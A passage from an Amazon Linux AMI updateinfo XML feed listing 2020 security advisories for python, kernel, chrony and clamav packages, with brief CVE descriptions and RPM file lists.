arch="i686"><filename>Packages/ruby19-devel-1.9.3.551-33.71.amzn1.i686.rpm</filename></package><package name="rubygem19-io-console" version="0.3" release="33.71.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem19-io-console-0.3-33.71.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1427</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1427: medium priority package update for python27</title><issued date="2020-08-27 00:20:00" /><updated date="2020-08-31 20:45:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-20907:
In Lib/tarfile.py in Python through 3.8.3, an attacker is able to craft a TAR archive leading to an infinite loop when opened by tarfile.open, because _proc_pax lacks header validation.
1856481: CVE-2019-20907 python: infinite loop in the tarfile module via crafted TAR archive
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20907" title="" id="CVE-2019-20907" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-debuginfo" version="2.7.18" release="2.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.18-2.139.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.18" release="2.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.18-2.139.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.18" release="2.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.18-2.139.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.18" release="2.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.18-2.139.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.18" release="2.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.18-2.139.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.18" release="2.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.18-2.139.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.18" release="2.139.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.18-2.139.amzn1.i686.rpm</filename></package><package name="python27-test" version="2.7.18" release="2.139.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.18-2.139.amzn1.i686.rpm</filename></package><package name="python27" version="2.7.18" release="2.139.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.18-2.139.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.18" release="2.139.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.18-2.139.amzn1.i686.rpm</filename></package><package 
name="python27-devel" version="2.7.18" release="2.139.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.18-2.139.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.18" release="2.139.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.18-2.139.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1428</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1428: medium priority package update for python36</title><issued date="2020-08-27 02:25:00" /><updated date="2020-08-31 21:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-20907:
In Lib/tarfile.py in Python through 3.8.3, an attacker is able to craft a TAR archive leading to an infinite loop when opened by tarfile.open, because _proc_pax lacks header validation.
1856481: CVE-2019-20907 python: infinite loop in the tarfile module via crafted TAR archive
CVE-2019-18348:
An issue was discovered in urllib2 in Python 2.x through 2.7.17 and urllib in Python 3.x through 3.8.0. CRLF injection is possible if the attacker controls a url parameter, as demonstrated by the first argument to urllib.request.urlopen with \r\n (specifically in the host component of a URL) followed by an HTTP header. This is similar to the CVE-2019-9740 query string issue and the CVE-2019-9947 path string issue. (This is not exploitable when glibc has CVE-2016-10739 fixed.)
1727276: CVE-2019-18348 python: CRLF injection via the host part of the url passed to urlopen()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18348" title="" id="CVE-2019-18348" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20907" title="" id="CVE-2019-20907" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python36-devel" version="3.6.11" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-devel-3.6.11-1.18.amzn1.x86_64.rpm</filename></package><package name="python36-debuginfo" version="3.6.11" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debuginfo-3.6.11-1.18.amzn1.x86_64.rpm</filename></package><package name="python36-libs" version="3.6.11" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-libs-3.6.11-1.18.amzn1.x86_64.rpm</filename></package><package name="python36-debug" version="3.6.11" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debug-3.6.11-1.18.amzn1.x86_64.rpm</filename></package><package name="python36" version="3.6.11" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-3.6.11-1.18.amzn1.x86_64.rpm</filename></package><package name="python36-tools" version="3.6.11" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-tools-3.6.11-1.18.amzn1.x86_64.rpm</filename></package><package name="python36-test" version="3.6.11" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-test-3.6.11-1.18.amzn1.x86_64.rpm</filename></package><package name="python36-devel" version="3.6.11" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/python36-devel-3.6.11-1.18.amzn1.i686.rpm</filename></package><package name="python36-libs" version="3.6.11" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/python36-libs-3.6.11-1.18.amzn1.i686.rpm</filename></package><package name="python36-test" version="3.6.11" release="1.18.amzn1" epoch="0" 
arch="i686"><filename>Packages/python36-test-3.6.11-1.18.amzn1.i686.rpm</filename></package><package name="python36-tools" version="3.6.11" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/python36-tools-3.6.11-1.18.amzn1.i686.rpm</filename></package><package name="python36-debug" version="3.6.11" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debug-3.6.11-1.18.amzn1.i686.rpm</filename></package><package name="python36" version="3.6.11" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/python36-3.6.11-1.18.amzn1.i686.rpm</filename></package><package name="python36-debuginfo" version="3.6.11" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debuginfo-3.6.11-1.18.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1429</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1429: medium priority package update for python34 python35</title><issued date="2020-08-27 02:29:00" /><updated date="2020-08-31 20:56:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-20907:
In Lib/tarfile.py in Python through 3.8.3, an attacker is able to craft a TAR archive leading to an infinite loop when opened by tarfile.open, because _proc_pax lacks header validation.
1856481: CVE-2019-20907 python: infinite loop in the tarfile module via crafted TAR archive
CVE-2019-18348:
An issue was discovered in urllib2 in Python 2.x through 2.7.17 and urllib in Python 3.x through 3.8.0. CRLF injection is possible if the attacker controls a url parameter, as demonstrated by the first argument to urllib.request.urlopen with \r\n (specifically in the host component of a URL) followed by an HTTP header. This is similar to the CVE-2019-9740 query string issue and the CVE-2019-9947 path string issue. (This is not exploitable when glibc has CVE-2016-10739 fixed.)
1727276: CVE-2019-18348 python: CRLF injection via the host part of the url passed to urlopen()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18348" title="" id="CVE-2019-18348" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20907" title="" id="CVE-2019-20907" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python34-test" version="3.4.10" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-test-3.4.10-1.51.amzn1.x86_64.rpm</filename></package><package name="python34" version="3.4.10" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-3.4.10-1.51.amzn1.x86_64.rpm</filename></package><package name="python34-devel" version="3.4.10" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-devel-3.4.10-1.51.amzn1.x86_64.rpm</filename></package><package name="python34-libs" version="3.4.10" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-libs-3.4.10-1.51.amzn1.x86_64.rpm</filename></package><package name="python34-tools" version="3.4.10" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-tools-3.4.10-1.51.amzn1.x86_64.rpm</filename></package><package name="python34-debuginfo" version="3.4.10" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-debuginfo-3.4.10-1.51.amzn1.x86_64.rpm</filename></package><package name="python34-debuginfo" version="3.4.10" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/python34-debuginfo-3.4.10-1.51.amzn1.i686.rpm</filename></package><package name="python34-devel" version="3.4.10" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/python34-devel-3.4.10-1.51.amzn1.i686.rpm</filename></package><package name="python34-libs" version="3.4.10" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/python34-libs-3.4.10-1.51.amzn1.i686.rpm</filename></package><package name="python34-tools" version="3.4.10" release="1.51.amzn1" 
epoch="0" arch="i686"><filename>Packages/python34-tools-3.4.10-1.51.amzn1.i686.rpm</filename></package><package name="python34-test" version="3.4.10" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/python34-test-3.4.10-1.51.amzn1.i686.rpm</filename></package><package name="python34" version="3.4.10" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/python34-3.4.10-1.51.amzn1.i686.rpm</filename></package><package name="python35-devel" version="3.5.9" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-devel-3.5.9-1.27.amzn1.x86_64.rpm</filename></package><package name="python35-debuginfo" version="3.5.9" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-debuginfo-3.5.9-1.27.amzn1.x86_64.rpm</filename></package><package name="python35-test" version="3.5.9" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-test-3.5.9-1.27.amzn1.x86_64.rpm</filename></package><package name="python35-libs" version="3.5.9" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-libs-3.5.9-1.27.amzn1.x86_64.rpm</filename></package><package name="python35" version="3.5.9" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-3.5.9-1.27.amzn1.x86_64.rpm</filename></package><package name="python35-tools" version="3.5.9" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-tools-3.5.9-1.27.amzn1.x86_64.rpm</filename></package><package name="python35-test" version="3.5.9" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/python35-test-3.5.9-1.27.amzn1.i686.rpm</filename></package><package name="python35-debuginfo" version="3.5.9" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/python35-debuginfo-3.5.9-1.27.amzn1.i686.rpm</filename></package><package name="python35-libs" version="3.5.9" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/python35-libs-3.5.9-1.27.amzn1.i686.rpm</filename></package><package 
name="python35-devel" version="3.5.9" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/python35-devel-3.5.9-1.27.amzn1.i686.rpm</filename></package><package name="python35-tools" version="3.5.9" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/python35-tools-3.5.9-1.27.amzn1.i686.rpm</filename></package><package name="python35" version="3.5.9" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/python35-3.5.9-1.27.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1430</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1430: important priority package update for kernel</title><issued date="2020-09-03 21:53:00" /><updated date="2024-05-23 21:37:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-14386:
A flaw was found in the Linux kernel. Memory corruption can be exploited to gain root privileges from unprivileged processes. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
CVE-2020-14356:
A null pointer dereference flaw was found in the Linux kernel cgroupv2 subsystem in versions before 5.7.10, in the way the system is rebooted. A local user could use this flaw to crash the system or escalate their privileges on the system.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14356" title="" id="CVE-2020-14356" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14386" title="" id="CVE-2020-14386" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools" version="4.14.193" release="113.317.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.193-113.317.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.193" release="113.317.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.193-113.317.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.193" release="113.317.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.193-113.317.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.193" release="113.317.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.193-113.317.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.193" release="113.317.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.193-113.317.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.193" release="113.317.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.193-113.317.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.193" release="113.317.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.193-113.317.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.193" release="113.317.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.193-113.317.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.193" release="113.317.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.193-113.317.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.193" release="113.317.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.193-113.317.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.193" release="113.317.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.193-113.317.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.193" release="113.317.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.193-113.317.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.193" release="113.317.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.193-113.317.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.193" release="113.317.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.193-113.317.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.193" release="113.317.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.193-113.317.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.193" release="113.317.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.193-113.317.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.193" release="113.317.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.193-113.317.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.193" release="113.317.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.193-113.317.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.193" release="113.317.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.193-113.317.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.193" 
release="113.317.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.193-113.317.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1431</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1431: medium priority package update for chrony</title><issued date="2020-09-03 22:01:00" /><updated date="2020-09-04 04:14:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-14367:
A flaw was found in chrony when creating the PID file under the /var/run/chrony folder. The file is created during chronyd startup while still running as the root user, and when it&#039;s opened for writing, chronyd does not check for an existing symbolic link with the same file name. This flaw allows an attacker with privileged access to create a symlink with the default PID file name pointing to any destination file in the system, resulting in data loss and a denial of service due to the path traversal.
99999:
CVE-2020-14367 chrony: Insecure writing to PID file
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14367" title="" id="CVE-2020-14367" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="chrony-debuginfo" version="3.2" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/chrony-debuginfo-3.2-1.27.amzn1.x86_64.rpm</filename></package><package name="chrony" version="3.2" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/chrony-3.2-1.27.amzn1.x86_64.rpm</filename></package><package name="chrony-debuginfo" version="3.2" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/chrony-debuginfo-3.2-1.27.amzn1.i686.rpm</filename></package><package name="chrony" version="3.2" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/chrony-3.2-1.27.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1432</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1432: medium priority package update for python34 python35 python36</title><issued date="2020-09-03 22:08:00" /><updated date="2023-02-17 00:02:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-14422:
A vulnerability was found in the way the ipaddress python module computes hash values in the IPv4Interface and IPv6Interface classes. This flaw allows an attacker to create many dictionary entries that degrade the performance of a dictionary containing IPv4Interface or IPv6Interface objects, possibly resulting in a denial of service. The highest threat from this vulnerability is to system availability.
CVE-2019-20907:
A flaw was found in python. In Lib/tarfile.py an attacker is able to craft a TAR archive leading to an infinite loop when opened by tarfile.open, because _proc_pax lacks header validation.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20907" title="" id="CVE-2019-20907" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14422" title="" id="CVE-2020-14422" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python34-tools" version="3.4.10" release="1.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-tools-3.4.10-1.52.amzn1.x86_64.rpm</filename></package><package name="python34-test" version="3.4.10" release="1.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-test-3.4.10-1.52.amzn1.x86_64.rpm</filename></package><package name="python34-debuginfo" version="3.4.10" release="1.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-debuginfo-3.4.10-1.52.amzn1.x86_64.rpm</filename></package><package name="python34-devel" version="3.4.10" release="1.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-devel-3.4.10-1.52.amzn1.x86_64.rpm</filename></package><package name="python34-libs" version="3.4.10" release="1.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-libs-3.4.10-1.52.amzn1.x86_64.rpm</filename></package><package name="python34" version="3.4.10" release="1.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-3.4.10-1.52.amzn1.x86_64.rpm</filename></package><package name="python34-libs" version="3.4.10" release="1.52.amzn1" epoch="0" arch="i686"><filename>Packages/python34-libs-3.4.10-1.52.amzn1.i686.rpm</filename></package><package name="python34-tools" version="3.4.10" release="1.52.amzn1" epoch="0" arch="i686"><filename>Packages/python34-tools-3.4.10-1.52.amzn1.i686.rpm</filename></package><package name="python34" version="3.4.10" release="1.52.amzn1" epoch="0" arch="i686"><filename>Packages/python34-3.4.10-1.52.amzn1.i686.rpm</filename></package><package name="python34-devel" version="3.4.10" release="1.52.amzn1" epoch="0" 
arch="i686"><filename>Packages/python34-devel-3.4.10-1.52.amzn1.i686.rpm</filename></package><package name="python34-test" version="3.4.10" release="1.52.amzn1" epoch="0" arch="i686"><filename>Packages/python34-test-3.4.10-1.52.amzn1.i686.rpm</filename></package><package name="python34-debuginfo" version="3.4.10" release="1.52.amzn1" epoch="0" arch="i686"><filename>Packages/python34-debuginfo-3.4.10-1.52.amzn1.i686.rpm</filename></package><package name="python35-test" version="3.5.9" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-test-3.5.9-1.28.amzn1.x86_64.rpm</filename></package><package name="python35-libs" version="3.5.9" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-libs-3.5.9-1.28.amzn1.x86_64.rpm</filename></package><package name="python35" version="3.5.9" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-3.5.9-1.28.amzn1.x86_64.rpm</filename></package><package name="python35-tools" version="3.5.9" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-tools-3.5.9-1.28.amzn1.x86_64.rpm</filename></package><package name="python35-devel" version="3.5.9" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-devel-3.5.9-1.28.amzn1.x86_64.rpm</filename></package><package name="python35-debuginfo" version="3.5.9" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-debuginfo-3.5.9-1.28.amzn1.x86_64.rpm</filename></package><package name="python35-tools" version="3.5.9" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/python35-tools-3.5.9-1.28.amzn1.i686.rpm</filename></package><package name="python35" version="3.5.9" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/python35-3.5.9-1.28.amzn1.i686.rpm</filename></package><package name="python35-libs" version="3.5.9" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/python35-libs-3.5.9-1.28.amzn1.i686.rpm</filename></package><package 
name="python35-debuginfo" version="3.5.9" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/python35-debuginfo-3.5.9-1.28.amzn1.i686.rpm</filename></package><package name="python35-devel" version="3.5.9" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/python35-devel-3.5.9-1.28.amzn1.i686.rpm</filename></package><package name="python35-test" version="3.5.9" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/python35-test-3.5.9-1.28.amzn1.i686.rpm</filename></package><package name="python36-test" version="3.6.12" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-test-3.6.12-1.19.amzn1.x86_64.rpm</filename></package><package name="python36-devel" version="3.6.12" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-devel-3.6.12-1.19.amzn1.x86_64.rpm</filename></package><package name="python36" version="3.6.12" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-3.6.12-1.19.amzn1.x86_64.rpm</filename></package><package name="python36-debuginfo" version="3.6.12" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debuginfo-3.6.12-1.19.amzn1.x86_64.rpm</filename></package><package name="python36-debug" version="3.6.12" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debug-3.6.12-1.19.amzn1.x86_64.rpm</filename></package><package name="python36-tools" version="3.6.12" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-tools-3.6.12-1.19.amzn1.x86_64.rpm</filename></package><package name="python36-libs" version="3.6.12" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-libs-3.6.12-1.19.amzn1.x86_64.rpm</filename></package><package name="python36-tools" version="3.6.12" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/python36-tools-3.6.12-1.19.amzn1.i686.rpm</filename></package><package name="python36" version="3.6.12" release="1.19.amzn1" epoch="0" 
arch="i686"><filename>Packages/python36-3.6.12-1.19.amzn1.i686.rpm</filename></package><package name="python36-debug" version="3.6.12" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debug-3.6.12-1.19.amzn1.i686.rpm</filename></package><package name="python36-test" version="3.6.12" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/python36-test-3.6.12-1.19.amzn1.i686.rpm</filename></package><package name="python36-libs" version="3.6.12" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/python36-libs-3.6.12-1.19.amzn1.i686.rpm</filename></package><package name="python36-debuginfo" version="3.6.12" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debuginfo-3.6.12-1.19.amzn1.i686.rpm</filename></package><package name="python36-devel" version="3.6.12" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/python36-devel-3.6.12-1.19.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1433</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1433: important priority package update for clamav</title><issued date="2020-09-14 20:55:00" /><updated date="2020-09-16 18:15:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-3481:
Fixed a vulnerability in the EGG archive module in ClamAV 0.102.0 - 0.102.3 that could cause a denial-of-service (DoS) condition. Improper error handling could cause a crash due to a NULL pointer dereference. This vulnerability is mitigated for those using the official ClamAV signature databases because the file type signatures in daily.cvd will not enable the EGG archive parser in affected versions.
CVE-2020-3481
CVE-2020-3350:
Fixed a vulnerability that a malicious user could exploit to replace a scan target directory with a symlink to another path, tricking clamscan, clamdscan, or clamonacc into removing or moving a different file (such as a critical system file). The issue would affect users who use the --move or --remove options for clamscan, clamdscan and clamonacc.
CVE-2020-3350
CVE-2020-3327:
Fixed a vulnerability in the ARJ archive-parsing module in ClamAV 0.102.3 that could cause a denial-of-service (DoS) condition. Improper bounds checking resulted in an out-of-bounds read that could cause a crash. The previous fix for this CVE in version 0.102.3 was incomplete. This fix correctly resolves the issue.
CVE-2020-3327
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3327" title="" id="CVE-2020-3327" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3350" title="" id="CVE-2020-3350" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3481" title="" id="CVE-2020-3481" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="clamav-data" version="0.102.4" release="1.44.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-data-0.102.4-1.44.amzn1.noarch.rpm</filename></package><package name="clamav-devel" version="0.102.4" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-devel-0.102.4-1.44.amzn1.x86_64.rpm</filename></package><package name="clamav-milter" version="0.102.4" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-milter-0.102.4-1.44.amzn1.x86_64.rpm</filename></package><package name="clamav-debuginfo" version="0.102.4" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-debuginfo-0.102.4-1.44.amzn1.x86_64.rpm</filename></package><package name="clamav-filesystem" version="0.102.4" release="1.44.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-filesystem-0.102.4-1.44.amzn1.noarch.rpm</filename></package><package name="clamd" version="0.102.4" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamd-0.102.4-1.44.amzn1.x86_64.rpm</filename></package><package name="clamav" version="0.102.4" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-0.102.4-1.44.amzn1.x86_64.rpm</filename></package><package name="clamav-lib" version="0.102.4" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-lib-0.102.4-1.44.amzn1.x86_64.rpm</filename></package><package name="clamav-update" version="0.102.4" release="1.44.amzn1" epoch="0" 
